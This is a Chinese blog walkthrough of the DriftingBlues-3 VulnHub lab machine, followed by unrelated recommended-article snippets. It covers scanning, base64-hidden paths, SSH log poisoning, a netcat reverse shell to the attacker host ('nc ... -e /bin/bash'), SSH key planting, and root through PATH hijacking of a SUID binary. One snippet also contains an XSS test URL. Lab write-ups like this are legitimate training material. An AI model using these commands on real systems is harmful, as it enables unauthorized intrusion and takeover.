vuluhub靶机:driftingblues-3

最新推荐文章于 2026-01-02 20:20:09 发布
原创 最新推荐文章于 2026-01-02 20:20:09 发布 · 668 阅读 · 18 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#linux #网络

一:主机发现

arp-scan -I eth0 10.9.23.0/24

二:端口扫描

nmap -T4 -sV -p- -A 10.9.23.180

三:端口探测

发现一张图片,没有其他发现

四:目录探测

dirb http://10.9.23.180

http://10.9.23.180/phpmyadmin/

得到一串abc

http://10.9.23.180/privacy/

得到一串ab

http://10.9.23.180/secret/

得到一串a

dirsearch -u http://10.9.23.180/

查看

10.9.23.180/robots.txt

发现一个目录

/eventadmins

/littlequeenofspades.html

查看源码发现base64编码

aW50cnVkZXI/IEwyRmtiV2x1YzJacGVHbDBMbkJvY0E9PQ==

解码得到

intruder? L2FkbWluc2ZpeGl0LnBocA==

继续解码

/adminsfixit.php

得到一个目录

可以看到这个文件可以获取 ssh auth log,所以可以尝试往日志文件写入一句话后门

五:漏洞利用

尝试登陆 SSH 写入 shell:

ssh ''@10.9.23.180

x指纹参数试试

试试反弹shell

在 kali 中开启监听:nc -lvp 6666
加入命令,访问 URL:
http://10.9.23.180/adminsfixit.php?x=nc 10.9.23.112 6666 -e /bin/bash
反弹 shell 成功

使用 Python 切换 bash:

python3 -c 'import pty;pty.spawn("/bin/bash")'

home目录下发现用户robertj

既然没有私钥秘钥,咱们生成一下

ssh-keygen -t rsa
将生成的私钥保存到
/home/robertj/.ssh/id_rsa

将 SSH 公钥文件另存为 authorized_keys,用于 SSH 登陆认证

python2 -m SimpleHTTPServer 9998

wget http://10.9.23.180:9998/id_rsa

将私钥复制到本地

nano id_rsa

chmod 755 id_rsa

chmod 400 id_rsa

ssh robertj@10.9.23.180 -i id_rsa

登录成功

得到第一个flag

六:提权

在 shell 中寻找 suid 程序:

find / -perm -u=s -type f 2>/dev/null

发现一个不常见的程序

/usr/bin/getinfo

根据上面输出的结果,可以推测这个程序中执行了

ip addr, cat /etc/hosts, uname -a
因此,在这种情况下,我们可以在环境变量 PATH 中提供一个目录 (/tmp),并创建一个 ip
或者 cat 文件,用于劫持命令,执行我们自定义的二进制文件就可以提权

export PATH=/tmp/:$PATH
cd /tmp
echo '/bin/bash' > ip
chmod +x ip
/usr/bin/getinfo

得到flag2,靶机结束

不言君
关注
Vulnhub靶机driftingblues 9
qq_48904485的博客
01-20 968
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机driftingblues9(10.0.2.24)目标:获取靶机root权限和flag靶机下载地址:http://www.vulnhub.com/entry/driftingblues-9-final,695/
Vulnhub靶机driftingblues 7
qq_48904485的博客
01-19 520
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机driftingblues7(10.0.2.23)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/driftingblues-7,680/
Vulnhub靶机driftingblues 2
qq_48904485的博客
01-13 708
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机driftingblues2(10.0.2.18)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/driftingblues-2,634/
vulnhub靶机driftingblues-9
waitagirl的博客
03-20 931
vulnhub靶机driftingblues-9
Vulnhub靶机driftingblues 6
qq_48904485的博客
01-16 542
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机driftingblues6(10.0.2.22)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/driftingblues-6,672/
vulnhub靶机driftingblues-5
waitagirl的博客
03-20 1826
vulnhub靶机driftingblues-5
Vulnhub靶机:AI-WEB-1.0
weixin_68416970的博客
05-22 2960
Vulnhub靶机:AI-WEB-1.0。AI-WEB-1.0是一个专门设计用来测试渗透测试者技能的靶机。这个靶机的目标是从/root/flag.txt获取flag,获得低权限的shell,然后将权限提升到root。
vulnhub靶机:Momentum-2
weixin_68416970的博客
05-28 1902
Momentum-2是一个中等难度的渗透测试靶机,主要涉及信息收集、漏洞发现、文件上传漏洞利用、反弹Shell、SSH登入以及提权等步骤。
Vulnhub靶机driftingblues 4
qq_48904485的博客
01-14 594
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机driftingblues4(10.0.2.20)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/driftingblues-4,661/
Vulnhub经典靶机:LampSecurity-CTF4
12-24
Vulnhub经典靶机:LampSecurity-CTF4
Linux:五种IO模型
2301_80894970的博客
12-27 991
本文介绍了五种I/O模型的理论概念,重点分析了非阻塞I/O和多路转接I/O模式。文章通过钓鱼的生动比喻,阐述了阻塞I/O、非阻塞I/O、信号驱动I/O、多路检测I/O和异步I/O的区别。详细讲解了select、poll和epoll三种多路转接技术的实现原理和代码示例,比较了它们的优缺点。特别深入分析了epoll的水平触发(LT)和边缘触发(ET)两种工作模式,指出ET模式必须配合非阻塞I/O使用才能发挥最佳性能。通过理论讲解和代码实现相结合的方式,全面展示了Linux系统下高效I/O处理的实现方法和技术演进
基于 Linux 内核模块的字符设备互斥访问实验
weixin_57340941的博客
12-30 444
这个信号量实验是。
Linux CFS 调度器深度解析
X
12-30 776
数学模型驱动: 用 vruntime 精确量化公平性简单性: 核心算法简洁优雅, 易于理解和维护自适应性: 自动适应不同负载和工作模式可扩展性: 通过组调度支持复杂场景表5: CFS 调度器的核心优势总结维度传统调度器CFS改进效果公平性基于优先级的时间片按权重的比例公平更精确的公平分配交互性需要启发式识别自然获得良好响应交互进程响应更快吞吐量固定时间片可能浪费动态调整, 减少切换整体吞吐量提升可配置性多个复杂参数主要调整 nice 值用户接口更简单代码维护复杂启发式逻辑。
Linux 实战:从零实现动态进度条(含缓冲区原理与多版本优化)
会当凌绝顶,一览众山小
12-28 2086
Linux 开发中,进度条是最基础也最实用的系统程序之一 —— 无论是文件下载、编译构建还是数据处理,一个直观的动态进度条能极大提升用户体验。但看似简单的进度条,背后藏着行缓冲区、回车换行区别、字符刷新等关键知识点。本文从基础概念入手,先拆解进度条的实现逻辑,再逐步实现 “固定速度” 和 “自适应进度” 两个版本,最后优化细节让进度条更流畅美观,帮你不仅 “会写”,还能 “理解为什么这么写”。
Linux 防火墙配置详解:iptables 与 firewalld 的实战指南
A5互联
12-30 957
在企业级 Linux 运维场景中,防火墙不仅是简单的“开关”,而是关系到网络安全性、业务可用性与性能边界的重要组件。本文以真实项目经验为基础,结合具体硬件配置、产品参数、代码示例和性能评估,全面讲解 `iptables` 与 `firewalld` 的架构差异、实战配置与优化方法,帮助你从一线配置走向深入的性能调优与安全设计。
Linux(redhat7.9)安装KVM虚拟机
两拆
12-27 432
在Redhat7.9系统中通过KVM安装虚拟机
18. 操作系统-Linux-信创
princemilo的博客
12-30 927
在国家信创战略全面推进的大背景下,国产操作系统正加速替代国外系统,广泛应用于政企办公、关键基础设施、云计算、数据中心等核心领域。
Linux固件:简明扼要,用您自己的语言阐述
2501_93209230的博客
12-29 856
例如,Wi-Fi/蓝牙模块中的蓝牙部分就是如此(是的,同一个模块中,蓝牙和 Wi-Fi 模块通常使用不同的固件版本)。蓝牙最初的设计是让主机通过 UART 上的 HCI 协议与控制器通信,而这正是 Linux 内核中蓝牙驱动程序的平台无关部分(我指的是内核源代码中 net/bluetooth 目录下的部分)所依赖的。然而,更多时候,厂商并不在意这一点,也没有明确声明主机和设备之间使用的协议版本。当然,这个话题还有很多其他方面,但这些都是需要进一步研究的特殊情况,通常在调试更具体的问题时才会变得有趣。
linux的ext家族的文件系中,inode是也存放在block中的
最新发布
cici_new_1987的专栏
01-02 191
ext 文件系统会将磁盘空间划分为多个固定大小的块(如 1KB、4KB),并从这些块中专门分配一部分连续区域作为「inode 表」(inode table),每个 inode 占据固定大小的存储空间(通常为 128 字节或 256 字节,具体取决于文件系统配置),而整个 inode 表本身就存储在一个或多个连续的磁盘块中。例如,如果一个文件的大小为1K,而块的大小为4K,那么该文件还是会占用一个块,块中剩下的3K被空闲出来,不能用于存储其他数据。因此,设置块的大小时,需要考虑要存储文件的大小。
zzz@zzz-virtual-machine:/home/11/Chapter6/实战26 Django debug page XSS漏洞$ ip addr |grep "ens" 2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000 inet 192.168.20.128/24 brd 192.168.20.255 scope global dynamic noprefixroute ens33 zzz@zzz-virtual-machine:/home/11/Chapter6/实战26 Django debug page XSS漏洞$ sudo docker ps CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES 28512967cd9b 53-web "sh start.sh" 6 months ago Up 2 minutes 3306/tcp, 0.0.0.0:32778->80/tcp, [::]:32778->80/tcp 53-web-1 468c5ce44b7f 52-web "sh start.sh" 6 months ago Up 2 minutes 3306/tcp, 0.0.0.0:32776->80/tcp, [::]:32776->80/tcp 52-web-1 a4cd4ada371b 50-web "sh start.sh" 6 months ago Up 2 minutes 3306/tcp, 0.0.0.0:32768->80/tcp, [::]:32768->80/tcp 50-web-1 cd6bb0546e77 49-web "sh start.sh" 6 months ago Up 2 minutes 3306/tcp, 0.0.0.0:32780->80/tcp, [::]:32780->80/tcp 49-web-1 fa35b3f63758 48-web "sh start.sh" 6 months ago Up 2 minutes 3306/tcp, 0.0.0.0:32775->80/tcp, [::]:32775->80/tcp 48-web-1 833ba3202997 47-web "sh start.sh" 6 months ago Up 2 minutes 3306/tcp, 0.0.0.0:32782->80/tcp, [::]:32782->80/tcp 47-web-1 f0680c169983 33url-web "sh start.sh" 6 months ago Up 2 minutes 3306/tcp, 0.0.0.0:32774->80/tcp, [::]:32774->80/tcp 33url-web-1 86c93e38d1a5 31-session "sh start.sh" 6 months ago Up 2 minutes 3306/tcp, 0.0.0.0:32770->80/tcp, [::]:32770->80/tcp 31-session-1 e99029096ba8 29cors-web1 "sh start.sh" 6 months ago Up 2 minutes 0.0.0.0:32781->80/tcp, [::]:32781->80/tcp 29cors-web1-1 5f1a16022f28 29cors-web "sh start.sh" 6 months ago Up 2 minutes 3306/tcp, 0.0.0.0:32769->80/tcp, [::]:32769->80/tcp 29cors-web-1 86d4971a0939 28jsonhijacking-web1 "sh start.sh" 6 months ago Up 2 minutes 0.0.0.0:32783->80/tcp, [::]:32783->80/tcp 28jsonhijacking-web1-1 4e5663cc649e 28jsonhijacking-web "sh start.sh" 6 months ago Up 2 minutes 3306/tcp, 0.0.0.0:32777->80/tcp, [::]:32777->80/tcp 28jsonhijacking-web-1 7fef443e3c2b vulhub/django:1.11.4 "/docker-entrypoint.…" 6 months ago Up 32 seconds 0.0.0.0:32788->8000/tcp, [::]:32788->8000/tcp 26djangodebugpagexss-web-1 c99af8fd4285 postgres:9.6-alpine "docker-entrypoint.s…" 6 months ago Up 33 seconds 5432/tcp 26djangodebugpagexss-db-1 2e74f2bc0e5b 27csrf-web "sh start.sh" 6 months ago Up 2 minutes 3306/tcp, 0.0.0.0:32772->80/tcp, [::]:32772->80/tcp 27csrf-web-1 e893915ab8d2 23apache-web "sh start.sh" 6 months ago Up 2 minutes 3306/tcp, 0.0.0.0:32773->80/tcp, [::]:32773->80/tcp 23apache-web-1 72029170fdbd 22nginx-web "/docker-entrypoint.…" 6 months ago Up 2 minutes 0.0.0.0:32779->80/tcp, [::]:32779->80/tcp 22nginx-web-1 ecbabf507cc3 11djangogissql-web "/docker-entrypoint.…" 6 months ago Up 2 minutes 0.0.0.0:32787->8000/tcp, [::]:32787->8000/tcp 11djangogissql-web-1 d66225c67042 vulhub/oracle:12c-ee "/entrypoint.sh" 6 months ago Up 2 minutes 1521/tcp, 5500/tcp, 8080/tcp 11djangogissql-db-1 为什么我还是打不开:http://192.168.20.128:32787/create_user/?username=<script>alert(1)</script>
12-05
但你在访问的是靶机服务,应该使用**靶机的 IP 地址**。 而根据文档要求: > 靶机环境:`139.196.87.102`(Vulhub) 所以你应该访问的是部署在远程服务器上的 Vulhub 靶场环境,而不是本地 IP。 2. **端口映射...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值